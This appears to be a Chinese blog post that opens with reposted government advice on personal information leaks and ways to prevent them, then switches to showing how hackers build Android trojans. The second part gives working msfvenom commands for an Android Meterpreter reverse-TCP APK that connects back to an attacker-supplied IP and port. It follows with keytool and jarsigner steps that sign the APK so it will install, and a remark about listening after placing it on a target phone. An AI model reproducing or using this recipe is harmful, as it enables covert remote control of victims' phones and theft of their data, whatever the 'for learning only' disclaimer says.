在此之前，我们先关注一下飘雪，谢谢您嘞，关注不迷路！

目录

1. 初步认识我们信息的安全性
2. 木马是如何潜入我们的身边的
3. 木马初步了解，对我们的危害

初步认识信息的安全性有多重要

在信息时代，我们能掌握最新资讯时，也容易被网络冲击伤害！造成我们信息泄露！

刚在银行办完业务，就接到理财推销电话；刚在网站浏览了买房信息，就接到房产中介公司的骚扰电话；刚给孩子报了课外班，就收到类似机构邀约短信……

当我们在网上留下痕迹时，个人信息也许正面临着被窃取甚至被利用的风险。提升个人信息安全意识，养成良好操作习惯，是降低风险隐患的重要手段。

我们的个人信息主要包括：姓名、性别、年龄、身份证号码、电话号码及家庭住址等在内的个人基本信息；网银账号、第三方支付账号、社交账号、邮箱账号等账户信息；通讯录信息、通话记录、短信记录、聊天记录、个人视频、照片等隐私信息以及你的设备信息、社会关系信息、网络行为信息等。

不要小看这些个人信息的泄露问题，可能会导致——

除了垃圾短信、骚扰电话的烦恼，还有个人身份被冒用这类较为严重的问题。同时，个人信息泄露是诈骗成功实施的关键因素，不法分子在精准掌握用户个人信息的前提下，能编造出迷惑性更高的诈骗场景，继而对公众实施欺诈。

因此，我们应了解以下个人信息泄露途径：

各类单据泄露个人信息

快递包装上的物流单含有网购者的姓名、电话、住址等信息，网友收到货物后不经意把快递单扔掉导致信息泄露；火车票实行实名制后，车票上印有购票者的姓名、身份证等信息，很多人在乘坐完火车后，会顺手丢弃火车票，不法分子一旦捡到，就可以通过读票仪器窃取车票中的个人信息；在刷卡购物的纸质对账单上，记录了持卡人的姓名、银行卡号、消费记录等信息，随意丢弃同样会造成个人信息泄露。

社交小细节泄露信息

使用微博、微信等社交工具与人进行线上互动时，不自觉透露姓名、职务、单位等信息；家长在朋友圈晒娃的同时，无意中透露了孩子的姓名、就读学校、所住小区；部分网友旅行发朋友圈打卡、晒火车票、登机牌时，忘了将身份证号码、二维码等敏感信息进行模糊处理……这些网上社交的小细节，都有可能出卖你的个人信息。

网购平台泄露信息

网上购物平台需要注册信息，如手机号，QQ号码等。通过这些，不法分子可以从QQ资料、空间等渠道获得更多个人信息。

有奖活动泄露信息

在街上，人们有时候会碰到商家邀请参加“调查问卷表”、购物抽奖活动或者申请免费邮寄会员卡等活动，他们一般会要求路人填写详细联系方式和家庭住址等，这相当于把自己的信息送上门！

海投简历泄露信息

大部分人找工作都是通过网上投简历的方式进行，而简历中的个人信息一应俱全，这些内容可能会被不法分子利用，以极低价格转手。不法分子可以通过这些私人信息赢得你的信任，对你进行诈骗。

打印资料泄露信息

各类考试报名、参加网校学习班等，经常要登记个人信息。一些打印店、复印店为了牟利，会将客户信息资料存档留底，然后转手卖掉。

“个性化服务”泄露隐私

很多个性化服务都需要个人信息，以LBS(基于位置的服务)为例，不少商家与社交网站合作，通过无线网络确定用户位置，从而推送商品或服务。更为可怕的是用户被实时“监控”，这为诈骗、绑架勒索等打开了方便之门。

那么，该如何避免个人信息泄露呢？8个建议助你远离侵害：

◆一是在处理快递单等含有个人信息资料的文件时，先抹掉个人信息再丢弃；

◆二是在外使用公共网络，下线要先清理痕迹，或者开启隐私模式；

◆三是在使用互联网的过程中，不要随意留下个人信息；

◆四是网上留电话号码，数字间用“-”隔开避免被搜索到；

◆五是朋友圈晒照片，一定要谨慎，尽量不晒包含个人信息的照片；

◆六是一般情况下，简历只提供必要信息。家庭信息，身份证号码等不要过于详细；

◆七是注册各类社交平台、网购平台等尽量使用较复杂的密码；

◆八是及时关闭手机WiFi功能，在公共场所不要随便使用免费WiFi。

来源：你的个人信息可能是这样泄露的，务必小心-中共中央网络安全和信息化委员会办公室

以上我们是信息泄露和防御避免受到伤害！下面我们来讲安卓木马是如何潜入我们的身边的！

木马是如何潜入我们的身边的？

很多人喜欢随便去百度下载一下apk文件，里面有些是带有木马的apk程序。还有些人喜欢点击不良视频网站地址和群链接！给骇客留下了大把获取你数据的机会！

我们顺便讲解骇客是如何制作安卓木马程序的！

msfvenom -p android/meterpreter/reverse_tcp LHOST=你的ip LPORT=6666 R > /root/apk.apk

这样我们就生成好一个apk 了。

木马初步了解，对我们的危害

我们要可以给apk 进行加证书 ，先生成密钥

keytool -genkey -V -keystore apk-trojan-key.keystore -alias apk -keyalg RSA -keysize 1024 -validity 999

然后进行签名

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore apk.apk apk

 验证一下我们的前面的签名

jarsigner -verify -verbose apk.apk

我们把签名后的apk.apk复制出来随便给一个安卓靶机，我们就可以进行监听！

我们文章仅供大家学习交流，一切为了学习